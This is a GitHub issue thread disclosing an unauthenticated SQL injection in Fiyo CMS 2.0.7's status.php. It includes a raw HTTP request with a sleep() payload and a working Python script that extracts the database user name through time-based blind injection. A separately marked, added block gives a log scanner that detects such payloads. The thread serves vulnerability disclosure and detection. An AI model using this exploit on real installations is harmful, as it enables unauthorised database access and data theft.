dapur\apps\app_user\Status.php $_GET['stat'] $_GET['id'] variable exists SQL injection vulnerability #7
ok thx very much, we will update soon with new DB connection and query :)
On 21 July 2017 at 13:10, Rai4_1over ***@***.***> wrote:
Hello, I found that there are some problems with Fiyo CMS, hoping to help you and your work.
*Fiyo CMS version 2.0.7 has a SQL injection vulnerability. There is no need to log in when exploiting this vulnerability.*
*The code does not validate the $_GET['stat'] and $_GET['id'] variables.*
These two variables can be controlled by malicious attackers to control the program execution process and insert a malicious string into the database, causing SQL injection.
File location: dapur/app/app_user/controller/status.php
(https://github.com/FiyoCMS/FiyoCMS/blob/master/dapur/apps/app_user/controller/status.php)
[image: image]
<https://user-images.githubusercontent.com/20392808/28450633-13ecfa92-6e1b-11e7-9890-c79b8046b586.png>
*http://127.0.0.1/FiyoCMS/ <http://127.0.0.1/FiyoCMS/> is the installation path of the site program*
*Vulnerability Verification① (Send a SQL injection attack packet that causes a response delay)*
Get_Url: http://127.0.0.1/FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0)
Referrer: http://127.0.0.1
Detailed HTTP request packet
GET /FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://127.0.0.1/FiyoCMS/
Cookie: Hm_lvt_2f11040b51649a178c3fc835fd60c6f1=1499412807,1499422916,1499519057,1499663544; PHPSESSID=l25a9dch25s6uhmpara5klmoo0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0
*The response was delayed by 5 seconds*
[image: image]
<https://user-images.githubusercontent.com/20392808/28450876-ac081356-6e1c-11e7-837d-2f73c6f419df.png>
*Vulnerability Verification② (Use the Python script for SQL injection attacks and get the current database user name)*
Python PoC code
```python
import requests
import time

if __name__ == '__main__':
    Target_url = 'http://127.0.0.1/FiyoCMS/'
    print('Began to guess the length of the database user name !!')
    # Time-based blind injection: the page only answers slowly when the
    # injected condition is true, so the response delay is the oracle.
    for x in range(50):
        start_time = time.time()
        payload = '''8899 or if(length(user())={x},sleep(2),0)'''.format(x=x)
        headers = {'Referer': Target_url}
        response = requests.get(
            Target_url + '/dapur/apps/app_user/controller/status.php?stat=1&id=' + payload,
            headers=headers)
        end_time = time.time()
        if (end_time - start_time) > 1:
            length = x
            break
    print('The database user name length is {length} !!'.format(length=length))
    print('Start guessing the database username !!')
    username = ''
    # Recover the user name one character at a time, position by position.
    for x in range(length + 1):
        pay_str = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
        for p in pay_str:
            start_time = time.time()
            headers = {'Referer': Target_url}
            payload = '''8899 or if(substr(user(),{q},1)='{w}',sleep(2),0) '''.format(q=x, w=p)
            response = requests.get(
                Target_url + '/dapur/apps/app_user/controller/status.php?stat=1&id=' + payload,
                headers=headers)
            end_time = time.time()
            if (end_time - start_time) > 1:
                username = username + p
                print(username)
                break
    print('The database user name is {username}'.format(username=username))
```
[image: image]
<https://user-images.githubusercontent.com/20392808/28451007-65175e6a-6e1d-11e7-8d57-1fd89e46d1b8.png>
*Discoverer: Neusoft of Rai4over*
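An added detection example for the report above, not code from the issue or from the FiyoCMS project: it parses constructed web-server access-log lines and flags requests to the status.php endpoint whose stat or id parameter is not a plain integer, singling out sleep()/benchmark() payloads like the one in the report as time-based injection. The combined log format and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log format: the request line is the quoted field.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+')

# Functions typical of time-based blind SQL injection; seeing one inside a
# parameter that should be an integer is a strong signal.
TIME_BASED_RE = re.compile(r'\b(sleep|benchmark)\s*\(', re.IGNORECASE)
INT_RE = re.compile(r'^-?\d+$')

def classify_request(target):
    """Return [(param, kind, decoded_value)] for one request target (path + query).
    Only the stat and id parameters of the affected endpoint are examined."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith('/dapur/apps/app_user/controller/status.php'):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes '+' and %XX
    findings = []
    for name in ('stat', 'id'):
        for value in params.get(name, []):
            if INT_RE.match(value):
                continue  # a plain integer is what the endpoint should accept
            kind = 'time-based-sqli' if TIME_BASED_RE.search(value) else 'non-integer'
            findings.append((name, kind, value))
    return findings

def scan_log(lines):
    """Return (ip, timestamp, param, kind, value) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, kind, value in classify_request(m['target']):
            hits.append((m['ip'], m['ts'], name, kind, value))
    return hits

# Constructed sample log lines; the second mirrors the request from the report.
SAMPLE_LOG = [
    '10.0.0.5 - - [21/Jul/2017:13:00:01 +0800] "GET /FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21 HTTP/1.1" 200 512',
    '10.0.0.9 - - [21/Jul/2017:13:00:07 +0800] "GET /FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0) HTTP/1.1" 200 512',
    '10.0.0.9 - - [21/Jul/2017:13:00:09 +0800] "GET /FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1%20or%201=1&id=21 HTTP/1.1" 200 512',
    '10.0.0.7 - - [21/Jul/2017:13:00:10 +0800] "GET /FiyoCMS/index.php?id=21+or+sleep(5) HTTP/1.1" 200 512',
]

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The last sample line is deliberately not flagged: the rule is scoped to the endpoint named in the report, so other pages need their own parameter rules.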
@firstryan If it is convenient, please confirm another file to fix the problem, and please help me apply for a CVE ID, thank you very much.